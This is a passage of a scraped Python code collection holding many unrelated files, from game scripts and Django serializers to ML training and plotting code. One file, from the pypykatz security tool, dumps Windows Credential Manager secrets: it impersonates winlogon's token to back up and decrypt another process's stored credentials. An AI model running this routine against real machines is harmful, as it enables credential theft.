self.x_y[1] - 60))\n self.ecran.blit(self.font.render(f\"{self.pokemon.statVieActuel} / {self.pokemon.statVie}\", True, (0, 0, 0)), (self.x_y[0], self.x_y[1] - 35))\n 
pg.draw.rect(self.ecran, (255, 0, 0), self.rectangle_max)\n pg.draw.rect(self.ecran, (0, 255, 50), pg.Rect(self.x_y[0], self.x_y[1], (( self.pokemon.statVieActuel / self.pokemon.statVie) * self.longueur), 20))\n\n","repo_name":"Nitcheuu/Hackaton","sub_path":"barrevie.py","file_name":"barrevie.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41915750851","text":"def solve(money, i):\n if money < 0:\n return float(\"inf\")\n\n if memo[money][i] != None:\n return memo[money][i]\n elif i == c:\n result = money\n else:\n result = min([solve(money - g, i + 1) for g in garments[i]])\n memo[money][i] = result\n return result\n\nt = int(input())\nfor tcase in range(t):\n m, c = map(int, input().split())\n memo = [[None for i in range(c+1)] for j in range(m+1)]\n garments = []\n for _ in range(c):\n garments.append(list(map(int, input().split()))[1:])\n \n ans = solve(m, 0)\n if ans == float(\"inf\"):\n print(\"no solution\")\n else:\n print(m - ans)\n ","repo_name":"TobiPristupin/CompetitiveProgramming","sub_path":"UVa/WeddingShopping11450_TopDown.py","file_name":"WeddingShopping11450_TopDown.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22378853824","text":"\"\"\"Role request serializers.\"\"\"\n# Utils\nimport datetime\n\n# Django REST Framework\nfrom rest_framework import serializers\n\n# Models\nfrom AmbieNet.users.models import RoleRequest, User\n\n# Serializers\nfrom AmbieNet.users.serializers import UserModelSerializer\n\nclass CreateRoleRequestSerializer(serializers.ModelSerializer):\n class Meta:\n model = RoleRequest\n fields = ('new_role', 'message')\n\n def validate(self, data):\n user = User.objects.get(username = self.context['requesting_user_username'])\n user_requests = RoleRequest.objects.filter(\n requesting_user = user\n )\n\n if user_requests.exists():\n last_user_request = user_requests.last()\n past_days = datetime.date.today().day - last_user_request.created.day\n\n if past_days < 30:\n raise serializers.ValidationError('This user have been done a request in the last 30 days')\n\n return data\n\n def create(self, data):\n user = User.objects.get(username = self.context['requesting_user_username'])\n role_request = RoleRequest.objects.create(\n requesting_user = user,\n **data\n )\n\n return role_request\n\nclass RoleRequestModelSerializer(serializers.ModelSerializer):\n\n requesting_user = UserModelSerializer(read_only=True)\n class Meta:\n model = RoleRequest\n fields = ('new_role', 'message', 'requesting_user', 'status')\n\n read_only_fields = (\n 'new_role',\n 'message',\n 'requesting_user',\n 'status'\n )\n\nclass AnswerRoleRequestSerializer(serializers.Serializer):\n\n staff_username = serializers.CharField(min_length=4)\n username = serializers.CharField(min_length=6)\n request_status = serializers.CharField()\n new_role = serializers.IntegerField(required = False, allow_null = True)\n\n def validate(self, data):\n \"\"\"Handle of validate the existence of user role request.\"\"\"\n user = User.objects.get(username = data['username'])\n user_requests = RoleRequest.objects.filter(\n requesting_user = user\n )\n\n if user_requests.exists():\n if user_requests.last().status != 1:\n raise serializers.ValidationError('This request has been answered in the past')\n else:\n raise serializers.ValidationError('This user doesn`t have pending requests')\n\n 
self.context['user_request'] = user_requests.last()\n self.context['requesting_user'] = user\n self.context['request_status'] = data['request_status']\n self.context['new_role'] = data['new_role']\n self.context['staff_username'] = data['staff_username']\n\n return data\n\n def save(self):\n\n role_request = self.context['user_request']\n requesting_user = self.context['requesting_user']\n\n if self.context['request_status'] == 'approved':\n role_request.status = '3'\n requesting_user.role = self.context['new_role']\n\n requesting_user.save()\n else:\n role_request.status = '2'\n\n role_request.staff_validator_username = self.context['staff_username']\n role_request.save()\n\n return role_request\n","repo_name":"sansuaza/Backend-AmbieNet","sub_path":"AmbieNet/users/serializers/role_requests.py","file_name":"role_requests.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11302517786","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"easy-color\",\n version=\"0.0.1\",\n author=\"Michael Moeller\",\n author_email=\"github@mk-moeller.de.com\",\n description=\"Easy color manipulation with python\",\n url=\"https://github.com/MichiMolle/color\",\n packages=setuptools.find_packages(),\n)","repo_name":"MichiMolle/color","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36426101010","text":"# Made by Kerb\nimport sys\nfrom com.it.br.gameserver.model.quest import State\nfrom com.it.br.gameserver.model.quest import QuestState\nfrom com.it.br.gameserver.model.quest.jython import QuestJython as JQuest\nfrom com.it.br.gameserver.model.actor.instance import L2NpcInstance\nfrom com.it.br.gameserver.datatables.sql import SpawnTable\n\nqn = \"652_AnAgedExAdventurer\"\n#Npc\nTANTAN = 32012\nSARA = 30180\n\n#Items\nCSS = 1464\n\nclass Quest (JQuest) :\n\n def __init__(self,id,name,descr): JQuest.__init__(self,id,name,descr)\n\n def onAdvEvent (self,event,npc,player) :\n st = player.getQuestState(qn)\n if not st: return\n htmltext = event\n if event == \"32012-02.htm\" :\n if st.getQuestItemsCount(CSS) > 99 :\n st.set(\"cond\",\"1\")\n st.setState(STARTED)\n st.playSound(\"ItemSound.quest_accept\")\n st.takeItems(CSS,100)\n htmltext = \"32012-03.htm\"\n npc.deleteMe()\n elif event == \"32012-02a.htm\" :\n st.exitQuest(1)\n st.playSound(\"ItemSound.quest_giveup\")\n return htmltext\n\n def onTalk (Self,npc,player):\n st = player.getQuestState(qn)\n htmltext = \"You are either not carrying out your quest or don't meet the criteria.\"\n if not st : return htmltext\n npcId = npc.getNpcId()\n id = st.getState()\n cond=st.getInt(\"cond\")\n if npcId == TANTAN and id == CREATED:\n if st.getPlayer().getLevel() >= 46 :\n htmltext = \"32012-01.htm\"\n else:\n htmltext = \"32012-00.htm\"\n st.exitQuest(1)\n elif npcId == SARA and st.getInt(\"cond\")==1 :\n htmltext = \"30180-01.htm\"\n EAD_CHANCE = st.getRandom(100)\n st.giveItems(57,5026)\n if EAD_CHANCE <= 50:\n st.giveItems(956,int(1*Config.RATE_QUESTS_REWARD))\n st.playSound(\"ItemSound.quest_finish\")\n st.exitQuest(1)\n return htmltext\n\nQUEST = Quest(652,qn,\"AnAgedExAdventurer\")\nCREATED = State('Start', QUEST)\nSTARTED = State('Started', 
QUEST)\n\nQUEST.setInitialState(CREATED)\nQUEST.addStartNpc(TANTAN)\n\nQUEST.addTalkId(TANTAN)\nQUEST.addTalkId(SARA)","repo_name":"L2jBrasil/L2jBrasil","sub_path":"L2JBrasil_DP/data/jscript/quests/652_AnAgedExAdventurer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"38110673116","text":"import os\nimport json\nimport time\nimport resource\nimport psutil\n\nimport dgl\nimport torch as th\n\ndef get_rank():\n \"\"\" Get rank of a process\n \"\"\"\n return th.distributed.get_rank()\n\ndef estimate_mem_train(root, task):\n ''' Estimate the memory consumption per machine during training.\n\n Parameters\n ----------\n root : str\n The path to the partitioned graph folder.\n task : str\n It's either an 'edge' task or a 'node' task.\n\n Returns\n -------\n a tuple of max memory size and shared memory size.\n '''\n mem_list = []\n shared_mem_list = []\n parts = []\n # Find the partition IDs from the folder.\n for f in os.listdir(root):\n if os.path.isdir(os.path.join(root, f)):\n parts.append(int(f[4:]))\n parts.sort()\n for i in parts:\n part_path = os.path.join(root, f'part{i}')\n if os.path.isdir(part_path):\n g = dgl.load_graphs(os.path.join(part_path, 'graph.dgl'))[0][0]\n num_nodes = g.number_of_nodes()\n num_edges = g.number_of_edges()\n # The memory consumption of the graph structure.\n # This includes the coo format (16), edge ID (8), inner edge (1),\n # original edge ID (8), edge type (8)\n struct_size = (num_edges * (16 + 8 + 1 + 8 + 8)\n # this includes inner node (1), node ID (8), original node ID (8),\n # node type (8)\n + num_nodes * (1 + 8 + 8 + 8)\n + (num_edges * 16 + num_nodes * 8) # This is to store the CSC format.\n ) / 1024/1024/1024\n node_feats = os.path.getsize(os.path.join(part_path, 'node_feat.dgl')) / 1024/1024/1024\n edge_feats = os.path.getsize(os.path.join(part_path, 'edge_feat.dgl')) / 1024/1024/1024\n # The memory usage when after the server runs.\n # At this point, all data are stored in the shared memory.\n shared_mem = stable_serv_mem = struct_size + node_feats + edge_feats\n # The peak memory usage\n # Here we assume that the shared memory is pre-allocated.\n # If we need to allocate regular memory, we need additional memory from the system.\n max_serv_mem = max([shared_mem + struct_size, # when loading the graph structure.\n shared_mem + node_feats, # when loading the node features.\n shared_mem + edge_feats]) # when loading the edge features.\n # The memory usage of all trainers in a machine.\n max_cli_mem = num_edges * 8 * 2 if task == 'edge' else num_nodes * 8 * 2\n # It's bit hard to estimate the trainer memory. 
Let's be more conservative.\n            max_cli_mem *= 1.5\n            max_cli_mem = max_cli_mem / 1024/1024/1024\n            mem_list.append(max(max_serv_mem, stable_serv_mem + max_cli_mem))\n            shared_mem_list.append(shared_mem)\n            print(f'part{i}, N={num_nodes}, E={num_edges}, peak serv mem: {max_serv_mem:.3f} GB, '\\\n                  f'stable serv mem: {stable_serv_mem:.3f} GB, '\\\n                  f'shared mem: {shared_mem_list[-1]:.3f} GB, cli mem: {max_cli_mem:.3f} GB')\n    return max(mem_list), max(shared_mem_list)\n\ndef estimate_mem_infer(root, graph_name, num_hidden, num_layers):\n    ''' Estimate the memory consumption for inference.\n\n    Parameters\n    ----------\n    root : str\n        The path to the partitioned graph folder.\n    graph_name : str\n        The graph name.\n    num_hidden : int\n        The hidden size for the GNN embeddings.\n    num_layers : int\n        The number of GNN layers.\n\n    Returns\n    -------\n    a tuple of max memory size and shared memory size.\n    '''\n    mem_list = []\n    shared_mem_list = []\n    parts = []\n    # Find the partition IDs from the folder.\n    for f in os.listdir(root):\n        if os.path.isdir(os.path.join(root, f)):\n            parts.append(int(f[4:]))\n    with open(os.path.join(root, graph_name + '.json'), 'r', encoding='utf-8') as f:\n        schema = json.load(f)\n    parts.sort()\n    for i in parts:\n        part_path = os.path.join(root, f'part{i}')\n        if os.path.isdir(part_path):\n            # number of nodes in the partition.\n            ntypes = list(schema['node_map'].keys())\n            num_part_nodes = []\n            for ntype in ntypes:\n                r = schema['node_map'][ntype][i]\n                num_part_nodes.append(r[1] - r[0])\n            num_part_nodes = sum(num_part_nodes)\n\n            g = dgl.load_graphs(os.path.join(part_path, 'graph.dgl'))[0][0]\n            num_nodes = g.number_of_nodes()\n            num_edges = g.number_of_edges()\n            # The memory size for the graph structure. The calculation is the same as above.\n            struct_size = (num_edges * (16 + 8 + 1 + 8 + 8) + num_nodes * (1 + 8 + 8 + 8)\n                    + (num_edges * 16 + num_nodes * 8)) / 1024/1024/1024\n            # The memory size for the node features.\n            node_feats = os.path.getsize(os.path.join(part_path, 'node_feat.dgl')) / 1024/1024/1024\n            # The memory size for the edge features.\n            edge_feats = os.path.getsize(os.path.join(part_path, 'edge_feat.dgl')) / 1024/1024/1024\n            # The shared memory stores the graph structure, the node features, edge features\n            # as well as the embeddings of the input layer and each GNN layer.\n            shared_mem = (struct_size + node_feats + edge_feats\n                    + num_part_nodes * num_hidden * 4 * (num_layers + 1) / 1024/1024/1024)\n            # The memory usage when after the server runs.\n            # Majority data is stored in shared memory. When saving the GNN embeddings to the disk,\n            # we need to extract the GNN node embeddings, which is stored\n            # in the local Pytorch tensor.\n            stable_serv_mem = shared_mem + num_part_nodes * num_hidden * 4 / 1024/1024/1024\n            # The peak memory usage\n            max_serv_mem = max([struct_size + shared_mem, shared_mem + node_feats,\n                shared_mem + edge_feats, stable_serv_mem])\n            # The memory usage of all trainers in a machine.\n            max_cli_mem = num_nodes * 8 * 2\n            # It's bit hard to estimate the trainer memory. 
Let's be more conservative.\n            max_cli_mem *= 1.5\n            max_cli_mem = max_cli_mem / 1024/1024/1024\n            mem_list.append(max(max_serv_mem, stable_serv_mem + max_cli_mem))\n            shared_mem_list.append(shared_mem)\n            print(f'part {i}, N={num_nodes}, E={num_edges}, peak serv mem: {max_serv_mem:.3f} GB, '\\\n                  f'stable serv mem: {stable_serv_mem:.3f} GB, '\\\n                  f'shared mem: {shared_mem_list[-1]:.3f} GB, cli mem: {max_cli_mem:.3f} GB')\n    return max(mem_list), max(shared_mem_list)\n\nclass SysTracker:\n    \"\"\" This tracks the system performance.\n\n    It tracks the runtime and memory consumption.\n    \"\"\"\n    def __init__(self, debug=True):\n        self._checkpoints = []\n        self._rank = dgl.distributed.rpc.get_rank()\n        self._debug = debug\n\n    # This is to create only one instance.\n    _instance = None\n\n    def __new__(cls, *args, **kwargs): # pylint: disable=unused-argument\n        \"\"\" Only create one instance.\n        \"\"\"\n        if not isinstance(cls._instance, cls):\n            cls._instance = object.__new__(cls)\n\n        return cls._instance\n\n    def check(self, name):\n        \"\"\" Check the system metrics.\n        \"\"\"\n        mem_info = psutil.Process(os.getpid()).memory_info()\n        gmem_info = psutil.virtual_memory()\n        self._checkpoints.append((name, time.time(), mem_info.rss, mem_info.shared,\n                                  resource.getrusage(resource.RUSAGE_SELF).ru_maxrss,\n                                  gmem_info.used, gmem_info.shared))\n        # We need to get the right rank\n        if self._rank < 0:\n            self._rank = dgl.distributed.rpc.get_rank()\n        if len(self._checkpoints) >= 2 and self._debug and self._rank == 0:\n            checkpoint1 = self._checkpoints[-2]\n            checkpoint2 = self._checkpoints[-1]\n            print(\"{}: elapsed time: {:.3f}, mem (curr: {:.3f}, peak: {:.3f}, shared: {:.3f}, \\\n                global curr: {:.3f}, global shared: {:.3f}) GB\".format(\n                name, checkpoint2[1] - checkpoint1[1],\n                checkpoint2[2]/1024/1024/1024, checkpoint2[4]/1024/1024,\n                checkpoint2[3]/1024/1024/1024, checkpoint2[5]/1024/1024/1024,\n                checkpoint2[6]/1024/1024/1024))\n\nsys_tracker = SysTracker()\n","repo_name":"RubensZimbres/GNN_AWS","sub_path":"python/graphstorm/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"10238891827","text":"from PyQt4.QtCore import SIGNAL, QUrl, QEvent\nfrom PyQt4.QtGui import QVBoxLayout\nfrom PyQt4.QtWebKit import QWebView, QWebPage\n\nimport re\n\nimport PluginBase\nimport streamTools\n\nHOMEURL = \"http://dir.xiph.org/\"\nTUNEIN = re.compile(r'/listen/\\d+/listen\\.(m3u|xspf)$')\n\nclass IcecastForm(PluginBase.PluginBase):\n    ''' Embeds the xiph.org Icecast yellow pages, and loads the \n    streams from the m3u and XSPF playlist files.\n    '''\n    moduleName = 'I&cecast'\n    moduleIcon = \"network-workgroup\"\n\n    def load(self):\n        pass\n\n    def event(self, event):\n        if event.type() == QEvent.Paint:\n            if not hasattr(self, 'webView'):\n                self._load()\n            self.event = super(IcecastForm, self).event\n        return False\n\n    def _load(self):\n        self.webView = QWebView(self)\n        self.webPage = self.webView.page()\n\n        self.layout = QVBoxLayout(self)\n        self.layout.addWidget(self.webView)\n        self.webView.load(QUrl(HOMEURL))\n        self.webPage.setLinkDelegationPolicy(QWebPage.DelegateExternalLinks)\n        self.connect(self.webPage, SIGNAL('linkClicked(const QUrl&)'), self._processLink)\n\n    def _processLink(self, url):\n        urlString = unicode(url.toString())\n        urlMatch = TUNEIN.search(urlString)\n        if urlMatch is not None:\n            self._playStation(urlString)\n        else:\n            self.webView.load(url)\n            self.webView.show()\n\n    def _playStation(self, url):\n        try:\n            streamList 
= streamTools.getStreamList(url)\n        except streamTools.ParseError:\n            return\n        if streamList:\n            self.modelManager.playQueue.extend(streamList)\n\n\ndef getWidget(modelManager, mpdclient, config, library):\n    return IcecastForm(modelManager, mpdclient, config, library)\n","repo_name":"tarmack/Pythagora","sub_path":"plugins/IcecastForm.py","file_name":"IcecastForm.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"26028016369","text":"\n\n\n\nINF = 9999999999999999999\nV = 9\ndef minDistance(dist, sptSet):\n\n    min = INF\n    min_index = -1\n    for v in range(V):\n        if sptSet[v] == False and dist[v]<= min:\n            min = dist[v]\n            min_index = v\n    return min_index\n\ndef dijkstra(graph, src):\n\n    dist = [INF]* V\n    sptSet = [False] * V\n    dist[src] = 0\n    for count in range(V-1):\n        u = minDistance(dist, sptSet)\n        sptSet[u] = True\n        for v in range(V):\n            if not sptSet[v] and graph[u][v] != 0 and dist[u] != INF:\n                if dist [u] + graph[u][v] < dist[v]: # relaxation condition\n                    dist[v] = dist [u] + graph[u][v]\n\n\n    return dist\n\n\ngraph = []\nfor i in range(V):\n    graph.append( [0] * V)\n\nedges = [\"0 1 4\",\n        \"1 2 8\",\n        \"2 3 7\",\n        \"3 4 9\",\n        \"4 5 10\",\n        \"3 5 14\",\n        \"2 5 4\",\n        \"2 8 2\",\n        \"8 6 6\",\n        \"6 5 2\",\n        \"7 6 1\",\n        \"7 8 7\",\n        \"7 1 11\",\n        \"0 7 8\"]\n\nfor edge in edges:\n    data = edge.split(\" \")\n    graph[int(data[0])][int(data[1])] = int(data[2])\n    graph[int(data[1])][int(data[0])] = int(data[2])\nprint(dijkstra(graph, 0))","repo_name":"Lufedi/ECI-PIMO-2017-2","sub_path":"Clases/dijkstra/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20123727232","text":"# Thank you!\n# https://www.tiraniddo.dev/2021/05/dumping-stored-credentials-with.html\n\nimport tempfile\nimport os\n\nfrom pypykatz import logger\nfrom pypykatz.commons.winapi.local.function_defs.advapi32 import CredBackupCredentials\nfrom pypykatz.commons.readers.local.process import Process, PROCESS_QUERY_LIMITED_INFORMATION\nfrom pypykatz.commons.readers.local.common.privileges import enable_debug_privilege, RtlAdjustPrivilege\nfrom pypykatz.commons.winapi.local.function_defs.advapi32 import SetThreadToken\nfrom pypykatz.dpapi.functiondefs.dpapi import CryptUnprotectData\nfrom pypykatz.dpapi.structures.credentialfile import CREDENTIAL_BLOB, CredentialFile\n\n\ndef dpapi_trustedcredman(target_pid, special_process = 'winlogon.exe', temp_file_path = None):\n    dec_data = None\n    try:\n        if temp_file_path is None:\n            tf = tempfile.NamedTemporaryFile(delete=False)\n            temp_file_path = tf.name \n            logger.debug('Temp file path: %s' % temp_file_path)\n            tf.close()\n\n        enable_debug_privilege()\n\n        ### opening winlogon and duplicating token, impersonating it, enabling SeTrustedCredmanAccessPrivilege\n        pwinlogon = Process(name = special_process, access = PROCESS_QUERY_LIMITED_INFORMATION, open = True)\n        winlogon_token = pwinlogon.duplicate_token()\n        SetThreadToken(winlogon_token)\n        RtlAdjustPrivilege(31, thread_or_process=True) #SeTrustedCredmanAccessPrivilege = 31\n        \n        \n        ### opening target process, getting handle on its token\n        puserprocess = Process(pid=target_pid, access = PROCESS_QUERY_LIMITED_INFORMATION, open = True)\n        puserprocess_token = puserprocess.get_process_token()\n\n        ### magic happens here\n        CredBackupCredentials(puserprocess_token, temp_file_path)\n\n        ### opening encrypted credentials file 
and decrypting it\n with open(temp_file_path, 'rb') as f:\n dec_data = CryptUnprotectData(f.read())\n\n\n ### parsing decrypted credfile\n results = []\n xf = CredentialFile.from_bytes(dec_data)\n blobsdata = xf.data\n if xf.unk == 2:\n res = CREDENTIAL_BLOB.from_bytes(blobsdata)\n results.append(res)\n blobsdata = blobsdata[res.size:]\n while len(blobsdata) > 0:\n res = CREDENTIAL_BLOB.from_bytes(blobsdata)\n results.append(res)\n blobsdata = blobsdata[res.size:]\n\n return dec_data, results, None\n except Exception as e: \n logger.debug('dpapi_trustedcredman err! %s' % e)\n return dec_data, None, e\n finally:\n try:\n os.unlink(temp_file_path)\n logger.debug('Temp file removed')\n except Exception as e:\n logger.debug('Failed to remove temp file! %s' % str(e))\n pass","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/dpapi/extras.py","file_name":"extras.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"6625116196","text":"import pandas as pd\nimport pickle\n# Load the model from the file\nwith open('alert_model.pkl', 'rb') as f:\n model, scaler, thresholds = pickle.load(f)\n# Define a function to predict alerts based on the input data\ndef predict_threshold(df, columns):\n # Standardize the input data\n input_data_scaled = scaler.transform(df[columns])\n # Make predictions using the model\n predictions = model.predict(input_data_scaled)\n # Check if each prediction is above or below threshold\n alerts = []\n for i in range(len(predictions)):\n if predictions[i] == 1:\n alerts.append(f\"Row {i}: Above threshold\")\n else:\n alerts.append(f\"Row {i}: Below threshold\")\n return alerts\n# Example usage\ninput_data = pd.DataFrame({'temperature_100': [20],\n 'pressure_100': [1000],\n 'wind_speed_100': [10],\n 'power_output_100': [1500]})\n# Select the columns to use for modeling\nfeatures = ['temperature_100', 'pressure_100', 'wind_speed_100', 'power_output_100']\nalerts = predict_threshold(input_data, features)\nfor alert in alerts:\n print(alert)\n","repo_name":"bpbpublications/IoT-Data-Analytics-using-Python","sub_path":"Chapter 09/code/901_9.6.py","file_name":"901_9.6.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24974770970","text":"import os\nos.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\nimport yaml\nfrom argparse import ArgumentParser\nfrom model.imm_model import lmm_model\nfrom data.data_util import CelabDataset,BatchTransform\nfrom train import train_model\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport copy\nfrom torch.optim import lr_scheduler\n\n\n\nparser = ArgumentParser()\nparser.add_argument(\"--config\", required=True, help=\"path to config\")\nopt = parser.parse_args()\nwith open(opt.config) as f:\n config = yaml.load(f)\n\n# Model Parameters\n\nmodel_param = config['model']\nnum_filter = model_param['n_filters']\nfinal_channel_size = model_param['final_channel_size']\ninv_std = model_param['inv_std']\nn_maps = model_param['n_maps']\nmap_sizes = model_param['map_sizes']\ngauss_mode = model_param['gauss_mode']\n\n# Data parameters\n\ndata_param = config['training']['train_dset_params']\ntrain_data_path = data_param['train_datadir']\ntrain_csv_file_path = data_param['train_datalabeldir']\ntrain_csv_filename = data_param['train_datalabelcsv']\ntrain_datatype = data_param['train_datatype']\n\nvalid_data_path = 
data_param['valid_datadir']\nvalid_csv_file_path = data_param['valid_datalabeldir']\nvalid_csv_filename = data_param['valid_datalabelcsv']\n\n\ntrain_celeb_ds = CelabDataset(datapath = train_data_path,\n csv_file_path = train_csv_file_path,\n csv_filename = train_csv_filename,\n data_type = train_datatype)\nvalid_celeb_ds = CelabDataset(datapath = valid_data_path,\n csv_file_path = valid_csv_file_path,\n csv_filename = valid_csv_filename,\n data_type = train_datatype)\n\nbatch = config['training']['batch']\n\n\ntrain_dl = torch.utils.data.DataLoader(train_celeb_ds,batch_size=batch, shuffle=True)\nvalid_dl = torch.utils.data.DataLoader(valid_celeb_ds,batch_size=batch, shuffle=True)\n#for image in train_dl:\n# print(image.size)\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\ndsts = {\"train\": train_celeb_ds, \"val\": valid_celeb_ds}\ndataloaders = {\"train\": train_dl, \"val\": valid_dl}\n \nmodel = lmm_model(num_filter=num_filter,final_channel_size=final_channel_size,inv_std=inv_std,nmaps=n_maps,map_sizes=map_sizes,gauss_mode=gauss_mode)\nif torch.cuda.is_available():\n model.to(device)\n# Neural Net Parameters\n\nn_epoch = config['training']['n_epoch']\nlr = config['training']['lr']['start_val']\nwts_decay = config['training']['lr']['decay']\nstep_sz = config['training']['lr']['step']\n\noptimizer_ft = optim.Adam(list(filter(lambda p: p.requires_grad, model.parameters())), \n lr = lr, betas=(0.9, 0.999), eps=1e-08, weight_decay=wts_decay, amsgrad=False)\n#optimizer_ft = optim.SGD(model.parameters(), lr=0.001, momentum=0.9)\nexp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=step_sz, gamma=0.1)\nmodel_ft = train_model(model, dsts,dataloaders,optimizer_ft, exp_lr_scheduler,\n num_epochs=n_epoch,data_type = train_datatype)\n","repo_name":"stanimman/imm-model-pytorch","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38567806442","text":"import numpy as np\n\n\ndef step1(crabs):\n distance = np.inf\n for i in range(crabs.max()):\n delta = np.abs(crabs - i)\n tmp = delta.sum()\n if tmp < distance:\n distance = tmp\n return distance\n\n\ndef step2(crabs):\n distance = np.inf\n for i in range(crabs.max()):\n delta = np.abs(crabs - i)\n tmp = (delta * (delta + 1) // 2).sum()\n if tmp < distance:\n distance = tmp\n return distance\n\n\ndef main():\n with open('resources/day7') as file:\n crabs = np.array(file.readline().split(\",\"), dtype=int)\n\n print(step2(crabs))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Eagleseb/AdventOfCode2021","sub_path":"day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18775327070","text":"#!/usr/bin/env python\n\n\"\"\"\nPlot visual benchmark (average seasonal cycle) of old vs new model runs.\n\nThat's all folks.\n\"\"\"\n__author__ = \"Martin De Kauwe\"\n__version__ = \"1.0 (18.10.2017)\"\n__email__ = \"mdekauwe@gmail.com\"\n\nimport netCDF4 as nc\nimport matplotlib.pyplot as plt\nimport sys\nimport datetime as dt\nimport pandas as pd\nimport numpy as np\nfrom matplotlib.ticker import FixedLocator\nimport os\n\ndef main(amb_fname, ele_fname):\n\n df_a = read_cable_file(amb_fname)\n df_e = read_cable_file(ele_fname)\n\n df_a = df_a[df_a.YEAR < 2017]\n df_e = df_e[df_e.YEAR < 2017]\n GPP_amb = df_a.groupby(\"YEAR\").GPP.sum()\n GPP_ele = 
df_e.groupby(\"YEAR\").GPP.sum()\n\n print(GPP_amb)\n print(GPP_ele)\n GPP_response = ((GPP_ele/GPP_amb)-1.0)*100.\n print(GPP_response)\n\ndef read_cable_file(fname):\n\n f = nc.Dataset(fname)\n time = nc.num2date(f.variables['time'][:],\n f.variables['time'].units)\n df = pd.DataFrame(f.variables['GPP'][:,0,0], columns=['GPP'])\n df['Qle'] = f.variables['Qle'][:,0,0]\n df['LAI'] = f.variables['LAI'][:,0,0]\n df['TVeg'] = f.variables['TVeg'][:,0,0]\n df['ESoil'] = f.variables['ESoil'][:,0,0]\n df['CO2air'] = f.variables['CO2air'][:,0]\n\n df['dates'] = time\n df = df.set_index('dates')\n df['YEAR'] = df.index.year\n\n UMOL_TO_MOL = 1E-6\n MOL_C_TO_GRAMS_C = 12.0\n\n # umol/m2/s -> g/C/30min\n df['GPP'] *= UMOL_TO_MOL * MOL_C_TO_GRAMS_C * 1800.0\n\n return df\n\n\nif __name__ == \"__main__\":\n\n amb_fname = \"outputs/EucFACE_amb_out.nc\"\n ele_fname = \"outputs/EucFACE_ele_out.nc\"\n main(amb_fname, ele_fname)\n","repo_name":"bibivking/EucFACE_run","sub_path":"plots/calculate_GPP_response.py","file_name":"calculate_GPP_response.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8745487181","text":"with open('wor.txt', mode='wt') as file :\n count = 0\n for item in range(0,25):\n if count<25:\n str1 = input(\"enter the name\")\n file.write(str1+\"\\n\")\n count = count+1\n if str1==\"\":\n break\n \n else:\n print(\"limit reached\")\n break\nfp1 = open('wor.txt',mode='rt')\nfp1.seek(0,0)\nfp1.readlines()\n ","repo_name":"manaschhapiya/forks2019","sub_path":"day04/absentee.py","file_name":"absentee.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36754063082","text":"import os, sys\nimport json\nimport csv\n\npseudosequences = \"class1_pseudosequences.csv\"\nbdata_file = \"bdata.20130222.mhci.txt\"\n\n# Allele name to the AA pseudosequence\nname_to_sequence = {}\nwith open(pseudosequences) as f:\n\tread_csv = csv.reader(f, delimiter=',')\n\tfor row in read_csv:\n\t\tallele = row[0]\n\t\tsequence = row[1]\n\t\tname_to_sequence[allele] = sequence\n\nfile = open(bdata_file)\nbdata_lines = file.readlines()[1:]\n\nin_file = 0\nnot_in_file = 0\ngreater_than = 0\n\ncomprehensive_dataset = {}\nfor line in bdata_lines:\n\tparsed = line.split()\n\tallele = parsed[1]\n\tpeptide_seq = parsed[3]\n\tinequality = parsed[4]\n\tbinding_affinity = parsed[5]\n\n\tif inequality == '>':\n\t\tgreater_than += 1\n\t\tcontinue\n\n\txallele = allele.replace('*', '')\n\tif xallele in name_to_sequence:\n\t\tin_file += 1\n\t\taa_seq = name_to_sequence[xallele]\n\n\t\tif aa_seq not in comprehensive_dataset.keys():\n\t\t\tcomprehensive_dataset[aa_seq] = []\n\t\tcomprehensive_dataset[aa_seq].append((peptide_seq, binding_affinity))\n\telse:\n\t\tnot_in_file +=1\n\nprint(\"Num alleles found: \", in_file)\nprint(\"Num alleles not found: \", not_in_file)\nprint(\"Num alleles greater than: \", greater_than)\n\n# Generate the new dataset with most of these amino acid sequences\nwith 